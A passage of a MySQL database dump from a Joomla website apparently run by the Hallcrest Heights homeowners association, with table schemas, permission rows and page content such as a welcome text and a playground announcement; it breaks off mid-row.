Progress','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(39,1,472,473,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.delete\":{\"6\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(40,1,474,475,1,'com_alfcontact','com_alfcontact','{\"core.admin\":[],\"core.manage\":[],\"core.create\":[],\"core.delete\":[]}'),(41,27,23,24,3,'com_content.article.3','Announcements','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(42,27,25,26,3,'com_content.article.4','Events','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(43,27,27,28,3,'com_content.article.5','A Guide to the Neighborhood','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(44,8,42,47,2,'com_content.category.7','Press','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(45,8,48,51,2,'com_content.category.8','Newsletters','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(46,44,43,44,3,'com_content.article.6','Community Spirit Is Hallcrest\'s Hallmark','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(47,44,45,46,3,'com_content.article.7','Press Article 2','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(48,27,29,30,3,'com_content.article.8','About Us','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(49,27,31,32,3,'com_content.article.9','About the Board of Directors ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(50,45,49,50,3,'com_content.article.10','Community Newsletters','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(51,52,53,54,3,'com_content.article.11','Energy Tips','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(52,8,52,65,2,'com_content.category.9','Interests','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(53,52,55,56,3,'com_content.article.12','Go Green','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(56,27,33,34,3,'com_content.article.13','Terms of Service','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(57,27,35,36,3,'com_content.article.14','Privacy Policy','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(58,1,476,481,1,'com_simplecalendar','com_simplecalendar','{\"core.admin\":[],\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.own\":[],\"core.edit.state\":[]}'),(59,58,477,480,2,'com_simplecalendar.category.11','Calendar','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(62,1,482,483,1,'com_xcloner-backupandrestore','xcloner-backupandrestore','{}'),(64,59,478,479,3,'com_simplecalendar.event.4','HHHOA Monthly Board Meeting','{\"core.create\":{\"6\":1,\"3\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(65,52,57,58,3,'com_content.article.15','The Hallcrest Annual Meeting','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(66,52,59,60,3,'com_content.article.16','How to avoid “special assessments”','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(67,1,484,485,1,'com_admintools','admintools','{}'),(68,1,486,487,1,'com_akeeba','akeeba','{}'),(69,27,37,38,3,'com_content.article.17','Hallcrest Heights Real Estate Guide','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(70,52,61,62,3,'com_content.article.18','Survey','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(71,27,39,40,3,'com_content.article.19','Take the Survey now!','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(72,52,63,64,3,'com_content.article.20','Take the Survey now!','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(73,1,488,489,1,'com_finder','com_finder','{}'),(74,1,490,491,1,'com_tags','com_tags','{}'),(75,1,492,493,1,'com_contenthistory','com_contenthistory','{}'),(76,1,494,495,1,'com_ajax','com_ajax','{}'),(77,1,496,497,1,'com_postinstall','com_postinstall','{}'),(78,18,86,87,2,'com_modules.module.27','Footer Links','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(79,18,88,89,2,'com_modules.module.42','HOA Newsletters','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(80,18,90,91,2,'com_modules.module.46','Announcements','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'); /*!40000 ALTER TABLE `jos_assets` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_associations` -- DROP TABLE IF EXISTS `jos_associations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_associations` ( `id` int(11) NOT NULL COMMENT 'A reference to the associated item.', `context` varchar(50) NOT NULL COMMENT 'The context of the associated item.', `key` char(32) NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.', PRIMARY KEY (`context`,`id`), KEY `idx_key` (`key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_associations` -- LOCK TABLES `jos_associations` WRITE; /*!40000 ALTER TABLE `jos_associations` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_associations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_banner_clients` -- DROP TABLE IF EXISTS `jos_banner_clients`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_banner_clients` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL DEFAULT '', `contact` varchar(255) NOT NULL DEFAULT '', `email` varchar(255) NOT NULL DEFAULT '', `extrainfo` text NOT NULL, `state` tinyint(3) NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `metakey` text NOT NULL, `own_prefix` tinyint(4) NOT NULL DEFAULT '0', `metakey_prefix` varchar(255) NOT NULL DEFAULT '', `purchase_type` tinyint(4) NOT NULL DEFAULT '-1', `track_clicks` tinyint(4) NOT NULL DEFAULT '-1', `track_impressions` tinyint(4) NOT NULL DEFAULT '-1', PRIMARY KEY (`id`), KEY `idx_own_prefix` (`own_prefix`), KEY `idx_metakey_prefix` (`metakey_prefix`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_banner_clients` -- LOCK TABLES `jos_banner_clients` WRITE; /*!40000 ALTER TABLE `jos_banner_clients` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_banner_clients` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_banner_tracks` -- DROP TABLE IF EXISTS `jos_banner_tracks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_banner_tracks` ( `track_date` datetime NOT NULL, `track_type` int(10) unsigned NOT NULL, `banner_id` int(10) unsigned NOT NULL, `count` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`track_date`,`track_type`,`banner_id`), KEY `idx_track_date` (`track_date`), KEY `idx_track_type` (`track_type`), KEY `idx_banner_id` (`banner_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_banner_tracks` -- LOCK TABLES `jos_banner_tracks` WRITE; /*!40000 ALTER TABLE `jos_banner_tracks` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_banner_tracks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_banners` -- DROP TABLE IF EXISTS `jos_banners`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_banners` ( `id` int(11) NOT NULL AUTO_INCREMENT, `cid` int(11) NOT NULL DEFAULT '0', `type` int(11) NOT NULL DEFAULT '0', `name` varchar(255) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `imptotal` int(11) NOT NULL DEFAULT '0', `impmade` int(11) NOT NULL DEFAULT '0', `clicks` int(11) NOT NULL DEFAULT '0', `clickurl` varchar(200) NOT NULL DEFAULT '', `state` tinyint(3) NOT NULL DEFAULT '0', `catid` int(10) unsigned NOT NULL DEFAULT '0', `description` text NOT NULL, `custombannercode` varchar(2048) NOT NULL, `sticky` tinyint(1) unsigned NOT NULL DEFAULT '0', `ordering` int(11) NOT NULL DEFAULT '0', `metakey` text NOT NULL, `params` text NOT NULL, `own_prefix` tinyint(1) NOT NULL DEFAULT '0', `metakey_prefix` varchar(255) NOT NULL DEFAULT '', `purchase_type` tinyint(4) NOT NULL DEFAULT '-1', `track_clicks` tinyint(4) NOT NULL DEFAULT '-1', `track_impressions` tinyint(4) NOT NULL DEFAULT '-1', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `language` char(7) NOT NULL DEFAULT '', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `version` int(10) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`id`), KEY `idx_state` (`state`), KEY `idx_own_prefix` (`own_prefix`), KEY `idx_metakey_prefix` (`metakey_prefix`), KEY `idx_banner_catid` (`catid`), KEY `idx_language` (`language`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_banners` -- LOCK TABLES `jos_banners` WRITE; /*!40000 ALTER TABLE `jos_banners` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_banners` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_categories` -- DROP TABLE IF EXISTS `jos_categories`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_categories` ( `id` int(11) NOT NULL AUTO_INCREMENT, `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.', `parent_id` int(10) unsigned NOT NULL DEFAULT '0', `lft` int(11) NOT NULL DEFAULT '0', `rgt` int(11) NOT NULL DEFAULT '0', `level` int(10) unsigned NOT NULL DEFAULT '0', `path` varchar(255) NOT NULL DEFAULT '', `extension` varchar(50) NOT NULL DEFAULT '', `title` varchar(255) NOT NULL, `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `note` varchar(255) NOT NULL DEFAULT '', `description` mediumtext, `published` tinyint(1) NOT NULL DEFAULT '0', `checked_out` int(11) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `access` int(10) unsigned DEFAULT NULL, `params` text NOT NULL, `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.', `metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.', `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `created_user_id` int(10) unsigned NOT NULL DEFAULT '0', `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0', `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `hits` int(10) unsigned NOT NULL DEFAULT '0', `language` char(7) NOT NULL, `version` int(10) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`id`), KEY `cat_idx` (`extension`,`published`,`access`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_path` (`path`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_categories` -- LOCK TABLES `jos_categories` WRITE; /*!40000 ALTER TABLE `jos_categories` DISABLE KEYS */; INSERT INTO `jos_categories` VALUES (1,0,0,0,21,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',0,'2009-10-18 16:07:09',0,'0000-00-00 00:00:00',0,'*',1),(2,27,1,1,2,1,'uncategorised','com_content','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:26:37',0,'0000-00-00 00:00:00',5007,'*',1),(3,28,1,3,4,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,57,'2017-01-13 19:30:15',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:27:35',0,'0000-00-00 00:00:00',0,'*',1),(4,29,1,5,6,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:27:57',0,'0000-00-00 00:00:00',0,'*',1),(5,30,1,7,8,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:15',0,'0000-00-00 00:00:00',0,'*',1),(6,31,1,9,10,1,'uncategorised','com_weblinks','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:33',0,'0000-00-00 00:00:00',0,'*',1),(7,44,1,11,12,1,'press','com_content','Press','press','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"_:blog\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\",\"tags\":null}',47,'2013-06-07 15:53:47',47,'2013-06-09 09:38:25',3081,'*',1),(8,45,1,13,14,1,'newsletters','com_content','Newsletters','newsletters','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\",\"tags\":null}',47,'2013-06-07 15:59:45',47,'2013-08-18 10:33:34',2491,'*',1),(9,52,1,15,16,1,'interests','com_content','Interests','interests','','',1,57,'2017-03-03 16:59:37',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\",\"tags\":null}',47,'2013-06-11 16:41:56',0,'0000-00-00 00:00:00',2760,'*',1),(11,59,1,19,20,1,'calendar','com_simplecalendar','Calendar','calendar','','<p>Calendar category</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\",\"tags\":null}',47,'2013-07-08 16:04:19',0,'0000-00-00 00:00:00',0,'*',1); /*!40000 ALTER TABLE `jos_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_contact_details` -- DROP TABLE IF EXISTS `jos_contact_details`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_contact_details` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `con_position` varchar(255) DEFAULT NULL, `address` text, `suburb` varchar(100) DEFAULT NULL, `state` varchar(100) DEFAULT NULL, `country` varchar(100) DEFAULT NULL, `postcode` varchar(100) DEFAULT NULL, `telephone` varchar(255) DEFAULT NULL, `fax` varchar(255) DEFAULT NULL, `misc` mediumtext, `image` varchar(255) DEFAULT NULL, `email_to` varchar(255) DEFAULT NULL, `default_con` tinyint(1) unsigned NOT NULL DEFAULT '0', `published` tinyint(1) NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `ordering` int(11) NOT NULL DEFAULT '0', `params` text NOT NULL, `user_id` int(11) NOT NULL DEFAULT '0', `catid` int(11) NOT NULL DEFAULT '0', `access` int(10) unsigned DEFAULT NULL, `mobile` varchar(255) NOT NULL DEFAULT '', `webpage` varchar(255) NOT NULL DEFAULT '', `sortname1` varchar(255) NOT NULL, `sortname2` varchar(255) NOT NULL, `sortname3` varchar(255) NOT NULL, `language` char(7) NOT NULL, `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `version` int(10) unsigned NOT NULL DEFAULT '1', `hits` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`published`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_contact_details` -- LOCK TABLES `jos_contact_details` WRITE; /*!40000 ALTER TABLE `jos_contact_details` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_contact_details` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_content` -- DROP TABLE IF EXISTS `jos_content`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_content` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.', `title` varchar(255) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `introtext` mediumtext NOT NULL, `fulltext` mediumtext NOT NULL, `state` tinyint(3) NOT NULL DEFAULT '0', `catid` int(10) unsigned NOT NULL DEFAULT '0', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `images` text NOT NULL, `urls` text NOT NULL, `attribs` varchar(5120) NOT NULL, `version` int(10) unsigned NOT NULL DEFAULT '1', `ordering` int(11) NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `access` int(10) unsigned NOT NULL DEFAULT '0', `hits` int(10) unsigned NOT NULL DEFAULT '0', `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.', `language` char(7) NOT NULL COMMENT 'The language code for the article.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`state`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB AUTO_INCREMENT=21 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_content` -- LOCK TABLES `jos_content` WRITE; /*!40000 ALTER TABLE `jos_content` DISABLE KEYS */; INSERT INTO `jos_content` VALUES (1,37,'Hallcrest Heights','home','<h1 style=\"text-align: center;\">Welcome to Hallcrest Heights</h1>\r\n<p><img style=\"float: left;\" src=\"images/homefront.jpg\" width=\"242px\" /></p>\r\n<p>The community of Hallcrest Heights sits comfortably at the gateway to the village of McLean. It is a charming neighborhood fashioned after historic Colonial Williamsburg, where period-style townhomes join dogwoods and crepe myrtles to line impeccably maintained streets. Residents enjoy miles of trails and walkways winding through 18 acres of professionally manicured grounds.<br /><br />Hallcrest is a family friendly neighborhood comprised of 158 residences, 6 park-like areas, a resident managed homeowners association and special events that serve to bring neighbors together as a community. Hallcrest Heights also offers access to some of the best schools in Fairfax County, great shopping and entertainment venues, and fantastic restaurants. In addition, Hallcrest residents enjoy close proximity to the region\'s airports, major highways and easy distance to the Metro- Silver Line.<br /><br />Hallcrest Heights is a welcoming community with a small town feel, just a few miles from the nation\'s capital.</p>\r\n<p> </p>','',1,2,'2013-05-17 15:21:18',46,'','2017-01-18 16:08:09',57,0,'0000-00-00 00:00:00','2013-05-17 15:21:18','0000-00-00 00:00:00','','','{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',23,11,'Hallcrest Heights','Hallcrest Heights',1,1477,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(2,38,'Work In Progress','work-in-progress','<h1>Work in Progress</h1>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum et metus a orci auctor convallis. Curabitur mattis ligula accumsan dolor pulvinar lacinia. Proin non nulla elit. Suspendisse lectus magna, tristique vitae sollicitudin ac, euismod sed tellus. Morbi vel tortor in dolor iaculis aliquam. Integer dictum dignissim mi, quis rutrum elit ultricies nec. Praesent varius nulla nec urna hendrerit tincidunt vel et arcu. Fusce bibendum facilisis risus, sed molestie sapien semper interdum.</p>\r\n<p>Morbi malesuada nisl vitae est pulvinar auctor. Aenean sagittis hendrerit interdum. Proin dictum scelerisque orci, id auctor metus cursus nec. Etiam pharetra, odio in dapibus semper, tellus tellus accumsan lorem, quis vehicula libero tellus vel ipsum. Vestibulum sit amet condimentum mauris. Duis sagittis, enim at elementum fringilla, magna lorem eleifend augue, vel elementum augue lorem sit amet nisi. Maecenas nec nisl a elit tincidunt tincidunt vitae eget nunc. Quisque id libero sagittis eros molestie elementum. Ut condimentum nibh sed sem auctor sit amet condimentum quam tincidunt. Phasellus venenatis ornare odio sagittis suscipit. Nunc consectetur pellentesque porta.</p>\r\n<p>Etiam ut lectus odio, vel semper nibh. Sed in enim massa. Sed tempor egestas augue, id dapibus nisl commodo id. Nullam vestibulum, ante vitae rhoncus cursus, velit est tristique lacus, elementum dapibus velit metus ac nisi. Fusce lectus lectus, lobortis sit amet suscipit ut, sollicitudin ut odio. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum et metus a orci auctor convallis. Curabitur mattis ligula accumsan dolor pulvinar lacinia. Proin non nulla elit. Suspendisse lectus magna, tristique vitae sollicitudin ac, euismod sed tellus. Morbi vel tortor in dolor iaculis aliquam. Integer dictum dignissim mi, quis rutrum elit ultricies nec. Praesent varius nulla nec urna hendrerit tincidunt vel et arcu. Fusce bibendum facilisis risus, sed molestie sapien semper interdum. Morbi malesuada nisl vitae est pulvinar auctor. Aenean sagittis hendrerit interdum. Proin dictum scelerisque orci, id auctor metus cursus nec. Etiam pharetra, odio in dapibus semper, tellus tellus accumsan lorem, quis vehicula libero tellus vel ipsum. Vestibulum sit amet condimentum mauris. Duis sagittis, enim at elementum fringilla, magna lorem eleifend augue, vel elementum augue lorem sit amet nisi.</p>\r\n<p>Maecenas nec nisl a elit tincidunt tincidunt vitae eget nunc. Quisque id libero sagittis eros molestie elementum. Ut condimentum nibh sed sem auctor sit amet condimentum quam tincidunt. Phasellus venenatis ornare odio sagittis suscipit. Nunc consectetur pellentesque porta. Etiam ut lectus odio, vel semper nibh. Sed in enim massa. Sed tempor egestas augue, id dapibus nisl commodo id. Nullam vestibulum, ante vitae rhoncus cursus, velit est tristique lacus, elementum dapibus velit metus ac nisi. Fusce lectus lectus, lobortis sit amet suscipit ut, sollicitudin ut odio.</p>','',1,2,'2013-05-17 15:26:17',46,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-05-17 15:26:17','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,10,'','',1,1627,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(3,41,'Announcements','announcement','<h2><span style=\"color: #d9ae04;\">New Playground</span></h2>\r\n<p>Installed on October, 2017 <strong>Hallcrest\'s new HAPPY PLAYGROUND is now open</strong>! Starting in 2012 the Association began investigating the possibility of building a playground for children under the age of 12. County requirements, equipment suppliers, location and other playgrounds in the area were all carefully researched, and, most important of all, the necessary funds were available. With the growing number of children in our community, the Board of Directors determined that such a facility would not only be a plus for community families, but would add value to Hallcrest. With much excitement, the playground officially opened on October 14, 2017 with a fun filled ceremony.</p>\r\n<p id=\"yui_3_16_0_ym19_1_1510058369347_93210\" class=\"yiv9950028705MsoNormal\">Please obey the posted rules, especially the one that requires adult supervision. It is important that dogs be kept away from the chip-filled play area, and that the other posted rules be observed.</p>\r\n<p> </p>\r\n<p> </p>','',1,2,'2013-06-07 15:33:31',47,'','2017-11-07 19:08:32',57,0,'0000-00-00 00:00:00','2013-06-07 15:33:31','0000-00-00 